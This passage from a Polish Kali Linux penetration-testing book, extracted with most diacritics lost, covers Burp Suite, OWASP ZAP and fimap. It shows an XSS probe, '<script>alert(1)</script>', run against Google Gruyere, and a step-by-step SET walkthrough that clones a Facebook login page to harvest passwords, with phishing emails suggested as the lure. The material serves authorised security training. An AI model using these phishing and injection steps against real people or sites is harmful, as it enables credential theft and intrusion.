BeEF dostarcza napastnikowi szczegoacute owych informacji na temat zaatakowanego systemu i logujewszystkie wykonywane w nim polecenia Informacje o zaatakowanym systemie oraz dziennikwykonanych polece mog by bez problemu skopiowane i wklejone do raportu ko cowego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
236
Obrona przed atakami dokonywanymi z u yciem narz dzi penetracyjnych opartych na prze-gl darkach jest bardzo trudna Najlepszym rozwi zaniem jest oczywi cie zadbanie o to aby zaw-sze korzysta z najnowszej wersji przegl darki z zainstalowanymi najnowszymi pakietami aktuali-zacji oraz z wy czon mo liwo ci uruchamiania apletoacutew Java czy animacji Flash Oproacutecztego dodatkow warstw zabezpiecze mog zapewni rozwi zania pozwalaj ce na wykrywanienajcz ciej spotykanych zagro e takie jak system NGIPS (ang Next Generation IntrusionPrevention System) Znacz c wi kszo ofiar atakoacutew przeprowadzonych z wykorzystaniemnarz dzi takich jak BeEF stanowi u ytkownicy ktoacuterzy klikn li specjalnie przygotowane czezamieszczone w wiadomo ci poczty elektronicznej lub udost pnione w popularnych serwi-sach spo eczno ciowych przez napastnika podaj cego si za kogo innego godnego zaufania
FoxyProxy mdash wtyczka przegl darki Firefox
Je eli masz przegl dark Firefox i chcesz u ywa serweroacutew proxy takich jak ZAP mdash Zed At-tack Proxy czy BURP do testowania aplikacji internetowych to mo esz skorzysta z wtyczkiFoxyProxy ktoacutera znakomicie upraszcza proces prze czania oraz w czania i wy czania po-szczegoacutelnych serweroacutew proxy Inaczej moacutewi c FoxyProxy to wtyczka przegl darki Firefoxpozwalaj ca na atwe zarz dzanie serwerami proxy modyfikacj ich ustawie oraz ich w -czanie i wy czanie Wtyczk FoxyProxy mo esz pobra z sieciowego repozytorium rozsze-rze programy Firefox
Gdy zainstalujesz wtyczk na pasku narz dzi w goacuternej cz ci g oacutewnego okna przegl darkipojawi si ikona FoxyProxy Kiedy j klikniesz lewym przyciskiem myszy wy wietli si oknoopcji i ustawie wtyczki
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
237
Aby doda nowy serwer proxy do wtyczki FoxyProxy powiniene wykona polecenia przed-stawione poni ej
1 Kliknij przycisk Add New Proxy Na ekranie pojawi si nowe okno dialogowe 2 Wybierz opcj Manual Proxy Configuration 3 Wpisz adres IP lub nazw serwera proxy oraz podaj numer jego portukomunikacyjnego
4 Kliknij przycisk OK aby zapisa ustawienia nowego serwera
W tym momencie wtyczka FoxyProxy jest jeszcze wy czona co oznacza e ca y ruch sieciowygenerowany przez przegl dark odbywa si bez po rednictwa serwera proxy (w polu SelectMode jest ustawiona opcja Completely disable FoxyProxy) Aby u y wybranego serwera proxyrozwi list Select Mode i wybierz z niej dan opcj Jak wida dzi ki takiemu rozwi zaniumo esz szybko prze cza przegl dark na roacute ne serwery proxy lub ca kowicie wy czymo liwo korzystania z serwera proxy
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
238
BURP Proxy
BURP Proxy to narz dzie ktoacutere przechwytuje ruch HTTP oraz HTTPS co pozwala pentesterowina badanie funkcjonowania aplikacji internetowych wyszukiwanie luk w ich zabezpieczeniachoraz analizowanie ruchu sieciowego generowanego mi dzy serwerem aplikacji a klientemPakiet BURP Proxy cieszy si ogromn popularno ci nie tylko ze wzgl du na zdolno prze-prowadzania analizy ruchu sieciowego ale roacutewnie a mo e przede wszystkim ze wzgl du namo liwo modyfikacji i retransmitowania przesy anych da bdquow locierdquo Za chwil wyja nimy jakwykorzysta pakiet BURP Proxy do modyfikowania da i wykradania danych uwierzytel-niaj cych u ytkownikoacutew
Pami taj e BURP Proxy to narz dzie wchodz ce w sk ad rozbudowanego pakietu narz dzio nazwie Burp Suite Kiedy u ytkownik wpisuje na pasku adresu swojej przegl darki wybranyadres URL taki jak na przyk ad httpwwwDrChaoscom oczekuje e zostanie przeniesionyna tak stron Serwer proxy przechwytuje takie danie i przesy a je do serwera niejakobdquow imieniurdquo danego klienta Serwery proxy s zazwyczaj wykorzystywane do monitorowania ge-nerowanego ruchu sieciowego oraz ochrony klientoacutew przed potencjalnie szkodliwymi danymi(np witrynami ze z o liwym oprogramowaniem czy witrynami zainfekowanymi) Jako pente-ster mo esz wykorzystywa serwery proxy do przechwytywania ruchu sieciowego wysy anegoprzez klienta a nast pnie kopiowania modyfikowania i retransmitowania jego da
Aby w systemie Kali Linux uruchomi program BURP Suite w menu g oacutewnym przejd do grupyKali Linux a nast pnie wybierz polecenie SniffingSpoofingWeb Sniffersburpsuite
Na ekranie pojawi si g oacutewne okno pakietu Burp Suite
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
239
Aby skonfigurowa serwer proxy przejd na kart Proxy Jak atwo zauwa y opcja przechwyty-wania ruchu sieciowego jest domy lnie w czona (Intercept is on) Kiedy jest w czona BURPProxy zatrzymuje wszystkie dania wysy ane z przegl darki klienta do serwera WWW dzi kiczemu pentester ma mo liwo pe nej analizy takiego po czenia Po zako czeniu przegl da-nia pentester mo e r cznie zezwoli na kontynuowanie po czenia
Opcj Intercept musisz wy czy r cznie w przeciwnym wypadku wszystkie dania wysy ane przezklienta b d przechwytywane i zatrzymywane na poziomie BURP Proxy
Kolejne opcje konfiguracyjne na ktoacutere musisz zwroacuteci uwag s umieszczone na karcieOptions Znajdziesz tutaj opcje pozwalaj ce na sprawdzenie lub zmian domy lnego portukomunikacyjnego wykorzystywanego przez BURP Proxy czy skonfigurowanie interfejsu sie-ciowego wykorzystywanego przez pakiet Domy lnie serwer BURP Proxy jest skonfigurowa-ny do pracy na interfejsie p tli zwrotnej jak przedstawiono na rysunku zamieszczonym poni ejInterfejs p tli zwrotnej to specjalny rodzaj interfejsu sieciowego reprezentuj cy komputer lokal-ny do ktoacuterego przypisany jest zazwyczaj adres IP 127001 Interfejs p tli zwrotnej nie jestpowi zany z adnym urz dzeniem fizycznym i jest stosowany po to aby korzystaj c z po -czenia sieciowego system operacyjny Twojego komputera moacuteg si komunikowa sam ze so-b Inaczej moacutewi c je eli chcesz poprzez sie wysy a do siebie wiadomo ci powinieneu y interfejsu p tli zwrotnej Je eli chcesz wykorzystywa pakiet Burp Suite do pracy z innymikomputerami powiniene w konfiguracji pakietu doda odpowiedni interfejs Ethernet orazpoda jego adres IP
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
240
W naszym przyk adzie b dziemy u ywa interfejsu p tli zwrotnej
Kolejnym etapem b dzie skonfigurowanie przegl darki do pracy z pakietem Burp SuitePraktycznie wszystkie przegl darki mo na skonfigurowa w niemal identyczny lub przynajm-niej bardzo zbli ony sposoacuteb Na kolejnym rysunku przedstawiamy konfiguracj serwera proxyw przegl darce Firefox
Gdy zako czysz konfiguracj serwera proxy w przegl darce przejd na dowoln stron WWWna przyk ad wpisuj c dany adres URL w pasku przegl darki (na przyk ad wwwDrChaoscom)Z pewno ci zauwa ysz e nic si nie wydarzy o Dzieje si tak poniewa opcja Intercept
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
241
jak pami tasz jest domy lnie w czona Je eli przyjrzysz si teraz karcie Intercept to przeko-nasz si e zmieni si jej kolor t a co oznacza e przechwycone zosta o nowe danie
Kiedy klikniesz kart Intercept b dziesz moacuteg dok adnie zbada natur przechwyconego -dania Po zako czeniu mo esz klikn przycisk Forward lub Drop co spowoduje odpowied-nio przes anie dalej lub zablokowanie przechwyconego dania
Je eli klikniesz przycisk Forward zobaczysz e przechwycone danie zostaje przekazane dalejdo serwera WWW a serwer odsy a odpowied Co wi cej powiniene roacutewnie zobaczy estrona WWW zosta a za adowana w oknie przegl darki Pami taj jednak e niektoacutere stronyWWW sk adaj si z wielu komponentoacutew i ich za adowanie b dzie wymaga o r cznego prze-kazania wielu da (czyli b dziesz musia wiele razy klika przycisk Forward)
Kolejn ciekaw i u yteczn funkcj pakietu jest Burp Spider czyli robot sieciowy pozwala-j cy na zautomatyzowanie procesu wykrywania i mapowania aplikacji internetowych Zanimb dziesz moacuteg z niego skorzysta musisz najpierw skonfigurowa serwer BURP Proxy dopracy z internetem tak jak to pokazywali my wcze niej Nast pnie w cz modu Burp Spiderktoacutery mo e automatycznie mapowa wszystkie przechwycone dania i wyszukiwa nowepotencjalne cele ataku
Aby u y modu u Burp Spider przejd na kart Spider gdzie zobaczysz domy lne ustawieniakonfiguracyjne robota sieciowego Aby w czy robota kliknij przycisk Spider is paused couruchomi robota i zmieni nazw przycisku na Spider is running (zobacz pierwszy rysunek nanast pnej stronie)
Burp Spider mapuje wszystkie dania przechwycone przez serwer proxy i wy wietla je na karcieTarget Aby zobaczy co zosta o do tej pory przechwycone przejd na kart Target Znajdziesztam list wszystkich przechwyconych przez proxy witryn z ktoacuterymi czy si wybrana przezCiebie witryna podczas adowania Adresy URL wy wietlone w szarym kolorze oznaczaj witrynyktoacuterych nie przegl da e bezpo rednio Adresy URL wyroacute nione czarnym kolorem oznaczajwitryny ktoacutere odwiedzi e bezpo rednio (zobacz drugi rysunek na nast pnej stronie)
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
242
Aby skorzysta z robota sieciowego kliknij wybrany adres URL prawym przyciskiem myszyi z menu podr cznego wybierz polecenie Spider this host
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
243
Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter
Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza
Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie
Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom
Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
244
Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
245
OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)
ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej
Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3
1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption
4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network
7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP
8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych
Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
246
Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron
ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji
W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere
Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz
pobra go na swoacutej komputer lokalny
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
247
Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334
Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL
Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid
Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
248
Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED
Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)
httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt
Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS
W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
249
Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP
Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji
Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
250
Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4
Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem
Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET
Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie
Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity
bloggercom)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
251
1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks
2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method
Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania
Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y
W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
252
Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook
Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony
Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)
Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-
myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)
Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
253
Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
254
Fimap
Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)
Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia
fimap --install -plugins
Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)
Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
255
ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom
Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie
fimap -u httpwwwthesecuritybloggercom
Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity
bloggercom jest odporna na tego typu ataki
Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
256
i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)
Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe
Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze
dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego
funkcjonowania
Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki
Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based
Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew
